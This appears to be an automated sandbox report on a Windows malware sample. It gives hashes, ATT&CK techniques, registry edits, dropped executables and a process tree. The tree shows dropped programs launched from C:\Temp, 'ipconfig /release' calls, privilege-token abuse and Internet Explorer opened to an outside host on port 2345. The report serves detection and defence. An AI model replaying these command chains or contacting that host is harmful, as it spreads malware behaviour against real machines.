17d625af5ca9af6a3d7b6daeeda308b675abc03c1f8ed1c82e0c355f43ef87a2

Analysis

max time kernel
199s
max time network
205s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
11-10-2023 18:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
Size

361KB
MD5

e4a58ed860ec0ca5c94fb69db07321ef
SHA1

0f68af43573edf1c2ced4834f4602f3b64a3998d
SHA256

17d625af5ca9af6a3d7b6daeeda308b675abc03c1f8ed1c82e0c355f43ef87a2
SHA512

99e15b884d5d169716b77dea78d4d0a42306ca4b31c1d4c249686a841787a512b89a10f2ae6cae3547eb28475670123268af3dbc9735a3fd16f3209f84fe2fce
SSDEEP

6144:fflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:fflfAsiVGjSGecvX

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 21 IoCs

pid	Process
3700	mgeywrmgezwrojeb.exe
1736	CreateProcess.exe
3800	hfaxspkica.exe
2208	CreateProcess.exe
4544	CreateProcess.exe
3284	i_hfaxspkica.exe
4900	CreateProcess.exe
4556	ytrljdbvto.exe
4436	CreateProcess.exe
2088	CreateProcess.exe
1800	i_ytrljdbvto.exe
4944	CreateProcess.exe
2796	icxvpnhfzx.exe
3716	CreateProcess.exe
844	CreateProcess.exe
2456	i_icxvpnhfzx.exe
1940	CreateProcess.exe
1568	ebwuomgezw.exe
3228	CreateProcess.exe
760	CreateProcess.exe
244	i_ebwuomgezw.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4280	ipconfig.exe
4392	ipconfig.exe
3200	ipconfig.exe
4124	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403870559"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E022DFE6-68E7-11EE-941E-DA5D5E1D8AF4} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31063284"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e01d3a14bb1f3846b5fc27e9e0ad356000000000020000000000106600000001000020000000242474508268790af204601e0f8b40589297aa9fe5b3cfebe2d7f697a3fe41ae000000000e8000000002000020000000b3ac317037d1a133c487ab72b66585c0b9719c910b76bc06705398dbebc8a89c200000005e6534318e1f7bfaf43e5a09e5748effbd7746ee23df1f76b5f34fe60048ba6e400000002bd06faad112b8739287909fc06e012631a78149b92a621b2bc532592e1a334e341d2c31893e06e93804ede211d871b166260398de22f210f9014282692f931c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3075664343"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3075820244"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e050d0b8f4fcd901	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e01d3a14bb1f3846b5fc27e9e0ad35600000000002000000000010660000000100002000000070612b24143f9f645ae1ef93353a34bc0c2f7f899ad1bb16fa771d7099931145000000000e800000000200002000000051498f3ff023ac4a59923efadd2958d733edd7e82600b72de80ac94c0ffaf62c20000000aa11a1edf4730b5cbd82e9ab812a53e553f5ceb2f1b61e67c3d20c24c93586e8400000003584b396188cd8420031f1c16e3b4f0217800bea29de057fcb961faecb1788ffb7f22ee5b04739527fae81d6adc6ba598bcbd32e00ae9471182834acd077183b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d02723c7f4fcd901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31063284"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3700	mgeywrmgezwrojeb.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3284	i_hfaxspkica.exe
Token: SeDebugPrivilege	1800	i_ytrljdbvto.exe
Token: SeDebugPrivilege	2456	i_icxvpnhfzx.exe
Token: SeDebugPrivilege	244	i_ebwuomgezw.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1448	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1448	iexplore.exe
1448	iexplore.exe
3660	IEXPLORE.EXE
3660	IEXPLORE.EXE
3660	IEXPLORE.EXE
3660	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 3764 wrote to memory of 3700	3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe	91
PID 3764 wrote to memory of 3700	3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe	91
PID 3764 wrote to memory of 3700	3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe	91
PID 3764 wrote to memory of 1448	3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe	92
PID 3764 wrote to memory of 1448	3764	NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe	92
PID 1448 wrote to memory of 3660	1448	iexplore.exe	97
PID 1448 wrote to memory of 3660	1448	iexplore.exe	97
PID 1448 wrote to memory of 3660	1448	iexplore.exe	97
PID 3700 wrote to memory of 1736	3700	mgeywrmgezwrojeb.exe	98
PID 3700 wrote to memory of 1736	3700	mgeywrmgezwrojeb.exe	98
PID 3700 wrote to memory of 1736	3700	mgeywrmgezwrojeb.exe	98
PID 3800 wrote to memory of 2208	3800	hfaxspkica.exe	102
PID 3800 wrote to memory of 2208	3800	hfaxspkica.exe	102
PID 3800 wrote to memory of 2208	3800	hfaxspkica.exe	102
PID 3700 wrote to memory of 4544	3700	mgeywrmgezwrojeb.exe	105
PID 3700 wrote to memory of 4544	3700	mgeywrmgezwrojeb.exe	105
PID 3700 wrote to memory of 4544	3700	mgeywrmgezwrojeb.exe	105
PID 3700 wrote to memory of 4900	3700	mgeywrmgezwrojeb.exe	110
PID 3700 wrote to memory of 4900	3700	mgeywrmgezwrojeb.exe	110
PID 3700 wrote to memory of 4900	3700	mgeywrmgezwrojeb.exe	110
PID 4556 wrote to memory of 4436	4556	ytrljdbvto.exe	112
PID 4556 wrote to memory of 4436	4556	ytrljdbvto.exe	112
PID 4556 wrote to memory of 4436	4556	ytrljdbvto.exe	112
PID 3700 wrote to memory of 2088	3700	mgeywrmgezwrojeb.exe	116
PID 3700 wrote to memory of 2088	3700	mgeywrmgezwrojeb.exe	116
PID 3700 wrote to memory of 2088	3700	mgeywrmgezwrojeb.exe	116
PID 3700 wrote to memory of 4944	3700	mgeywrmgezwrojeb.exe	120
PID 3700 wrote to memory of 4944	3700	mgeywrmgezwrojeb.exe	120
PID 3700 wrote to memory of 4944	3700	mgeywrmgezwrojeb.exe	120
PID 2796 wrote to memory of 3716	2796	icxvpnhfzx.exe	122
PID 2796 wrote to memory of 3716	2796	icxvpnhfzx.exe	122
PID 2796 wrote to memory of 3716	2796	icxvpnhfzx.exe	122
PID 3700 wrote to memory of 844	3700	mgeywrmgezwrojeb.exe	125
PID 3700 wrote to memory of 844	3700	mgeywrmgezwrojeb.exe	125
PID 3700 wrote to memory of 844	3700	mgeywrmgezwrojeb.exe	125
PID 3700 wrote to memory of 1940	3700	mgeywrmgezwrojeb.exe	129
PID 3700 wrote to memory of 1940	3700	mgeywrmgezwrojeb.exe	129
PID 3700 wrote to memory of 1940	3700	mgeywrmgezwrojeb.exe	129
PID 1568 wrote to memory of 3228	1568	ebwuomgezw.exe	132
PID 1568 wrote to memory of 3228	1568	ebwuomgezw.exe	132
PID 1568 wrote to memory of 3228	1568	ebwuomgezw.exe	132
PID 3700 wrote to memory of 760	3700	mgeywrmgezwrojeb.exe	136
PID 3700 wrote to memory of 760	3700	mgeywrmgezwrojeb.exe	136
PID 3700 wrote to memory of 760	3700	mgeywrmgezwrojeb.exe	136

C:\Users\Admin\AppData\Local\Temp\NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.e4a58ed860ec0ca5c94fb69db07321ef_JC.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3764
- C:\Temp\mgeywrmgezwrojeb.exe
  C:\Temp\mgeywrmgezwrojeb.exe run
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3700
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\hfaxspkica.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1736
  - - C:\Temp\hfaxspkica.exe
      C:\Temp\hfaxspkica.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3800
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2208
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:3200
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_hfaxspkica.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4544
  - - C:\Temp\i_hfaxspkica.exe
      C:\Temp\i_hfaxspkica.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3284
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ytrljdbvto.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4900
  - - C:\Temp\ytrljdbvto.exe
      C:\Temp\ytrljdbvto.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4556
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4436
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4124
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ytrljdbvto.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2088
  - - C:\Temp\i_ytrljdbvto.exe
      C:\Temp\i_ytrljdbvto.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1800
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\icxvpnhfzx.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4944
  - - C:\Temp\icxvpnhfzx.exe
      C:\Temp\icxvpnhfzx.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2796
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:3716
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4280
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_icxvpnhfzx.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:844
  - - C:\Temp\i_icxvpnhfzx.exe
      C:\Temp\i_icxvpnhfzx.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2456
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ebwuomgezw.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1940
  - - C:\Temp\ebwuomgezw.exe
      C:\Temp\ebwuomgezw.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1568
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:3228
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4392
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ebwuomgezw.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:760
  - - C:\Temp\i_ebwuomgezw.exe
      C:\Temp\i_ebwuomgezw.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:244
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1448
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1448 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:3660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
3ce12f9a418594c8acb0f519523afe01

SHA1
5780db9963037a0dd177e110546aaf507da47296

SHA256
b0d4cf92aa570b2d233fce5055691312bb2731b4ee4f18782d1010f80a1516a6

SHA512
5923f2e53f2a84965cab7445d7e7742940f86b6f6c26693b2d6ae4c12aff5e3b0dd6c544a1fd15a80fc899d72c2d5cfef6d1fac436c36fece28d86bb59293f04

Download Submit
C:\Temp\ebwuomgezw.exe

Filesize
361KB

MD5
ca626fbd1c37aad184def5b876bb15d3

SHA1
ee107176d1c87113d0c3d739066bed78876ed1fb

SHA256
4721f1ef96e34f9cc5aad22a46d05ba288a58b000df9c4ff7b8d20150da0bf50

SHA512
59e128fce39eae9894e8f9d031a03bcf05c376fdc3a8510b2d3b516056c1936c808da96bb03d1d8049a5f6661b8cf55386895e2a7e9baac19359f2fa5a8d5c7c

Download Submit
C:\Temp\ebwuomgezw.exe

Filesize
361KB

MD5
ca626fbd1c37aad184def5b876bb15d3

SHA1
ee107176d1c87113d0c3d739066bed78876ed1fb

SHA256
4721f1ef96e34f9cc5aad22a46d05ba288a58b000df9c4ff7b8d20150da0bf50

SHA512
59e128fce39eae9894e8f9d031a03bcf05c376fdc3a8510b2d3b516056c1936c808da96bb03d1d8049a5f6661b8cf55386895e2a7e9baac19359f2fa5a8d5c7c

